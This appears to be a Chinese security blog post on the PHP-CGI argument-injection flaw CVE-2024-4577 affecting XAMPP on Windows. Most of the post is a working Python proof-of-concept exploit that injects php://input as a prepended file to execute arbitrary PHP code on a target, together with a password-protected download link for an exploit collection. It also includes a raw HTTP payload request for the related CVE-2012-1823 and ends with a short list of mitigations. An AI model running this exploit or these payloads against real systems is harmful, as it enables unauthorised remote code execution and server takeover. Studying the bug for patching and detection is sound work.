XAMPP PHP-CGI 远程代码执行漏洞(CVE-2024-4577)

漏洞概述:

PHP 是一种被广泛应用的开放源代码的多用途脚本语言,PHP-CGI 是 PHP 自带的 FastCGI 管理器。是一个实现了 CGI 协议的程序,用来解释 PHP 脚本的程序,2024 年 6 月 7 日,推特安全上 orange 公开了其漏洞细节,并且 PHP 官方已修复该漏洞。并确认该漏洞在为远程代码执行漏洞,并将其分配编号为 CVE-2024-4577。

XAMPP(Apache+MySQL+PHP+PERL)就是一个功能强大的建站集成软件包,该漏洞在 XAMPP 开启了 PHP-CGI 模式下运行时可造成远程代码执行,攻击者可通过该漏洞获取服务器权限。

该漏洞仅适用于 php 版本为 8.1 < 8.1.29,PHP 8.2 < 8.2.20,PHP 8.3 < 8.3.8,同时在 php-cgi 模式下运行 php,并且运行在 windows 平台,且使用语系为繁体中文 950、日文 932、简体中文 936 等。

威胁等级:

严重

漏洞分类:

远程命令执行

影响资产分类:

应用服务


漏洞复现(POC):

"""
PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC
Discovered by: Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
Exploit By: Aliz (@AlizTheHax0r) and Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber) 
Technical details: https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?github
Reference: https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/
Website: https://www.chwm.vip/?CVE-2024-4577
"""

banner = """			 __         ___  ___________                   
	 __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________ 
	 \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
	  \\     / / __ \\|  | \\  \\___|   Y  |    |(  <_> \\     / |  | \\/
	   \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|   
				  \\/          \\/     \\/                            
	  
        watchTowr-vs-php_cve-2024-4577.py
        (*) PHP CGI Argument Injection (CVE-2024-4577) discovered by Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
          - Aliz Hammond, watchTowr (aliz@watchTowr.com)
          - Sina Kheirkhah (@SinSinology), watchTowr (sina@watchTowr.com)
          - Rainbow (rainbow_nt@hotmail.com)
        CVEs: [CVE-2024-4577]  """


import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import requests
requests.packages.urllib3.disable_warnings()
import argparse

print(banner)
print("(^_^) prepare for the Pwnage (^_^)\n")

parser = argparse.ArgumentParser(usage="""python CVE-2024-4577 --target http://192.168.1.1/index.php -c "<?php system('calc')?>""")
parser.add_argument('--target', '-t', dest='target', help='Target URL', required=True)
parser.add_argument('--code', '-c', dest='code', help='php code to execute', required=True)
args = parser.parse_args()
args.target = args.target.rstrip('/')


s = requests.Session()
s.verify = False



res = s.post(f"{args.target.rstrip('/')}?%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input", data=f"{args.code};echo 1337; die;" )
if('1337' in res.text ):
    print('(+) Exploit was successful')
else:
    print('(!) Exploit may have failed')
    
print('(*) WebSite https://www.chwm.vip/?CVE-2024-4577')

 


漏洞库: 

https://www.lanzouh.com/b04eghy4f
密码:b8ox

### Apache 和 PHP-CGI 存在的安全漏洞详情 #### CVE-2012-1823 漏洞概述 CVE-2012-1823 是一个存在于 PHPCGI SAPI 中的远程代码执行 (RCE) 漏洞。此漏洞仅影响以 CGI 模式运行的 PHP 版本,而不影响 FastCGI 模式下的 PHP 运行实例[^1]。 当 Web 服务器(如 Apache)接收到特定构造的 URL 请求时,PHP 解析器可能会错误处理这些请求中的参数,从而允许攻击者通过精心设计的查询字符串注入并执行任意 PHP 代码。这种行为使得攻击者能够在目标服务器上获得未授权访问权限,进而可能完全控制受影响的应用程序甚至整个操作系统环境。 #### 影响范围与危害程度 该漏洞主要影响使用 PHP-CGI 接口作为其解析引擎配置项之一的服务端部署架构;特别是那些启用了 `cgi.fix_pathinfo` 配置选项的情况更为严重。对于采用 XAMPP 等集成开发平台,默认情况下如果开启了 PHP-CGI 支持,则也可能受到这一问题的影响[^4]。 #### 利用方式示例 攻击者可以通过发送如下形式的数据包来尝试触发漏洞: ```http POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1 Host: PhpVulnEnv REDIRECT_STATUS: XCANWIN <?php die("Te"."sT");?> ``` 这段恶意负载试图修改 PHP 的内部设置以启用危险的功能,并强制加载来自外部源的内容,在某些条件下可以实现命令注入的效果[^3]。 ### 如何修复此类安全风险 为了防止上述类型的攻击发生,建议采取以下措施: - **升级版本**:确保使用的 PHP 软件是最新的稳定版,官方已经针对已知的安全隐患发布了补丁。 - **禁用不必要的模块和服务**:关闭任何不必要或很少使用的功能特性,比如这里提到的 CGI 方式的支持,转而推荐更安全高效的替代方案——FastCGI 或 mod_php- **调整配置文件**:编辑 php.ini 文件并将 `cgi.fix_pathinfo=0` 设置为零值,这有助于减少潜在路径遍历的风险。 - **强化Web应用防火墙(WAF)**:部署有效的 WAF 可以为网站提供额外一层防护屏障,帮助识别和阻止异常流量模式以及常见的攻击向量。 - **定期审查日志记录**:保持良好的监控习惯,及时发现可疑活动迹象以便快速响应处置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Rainbow Technology

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值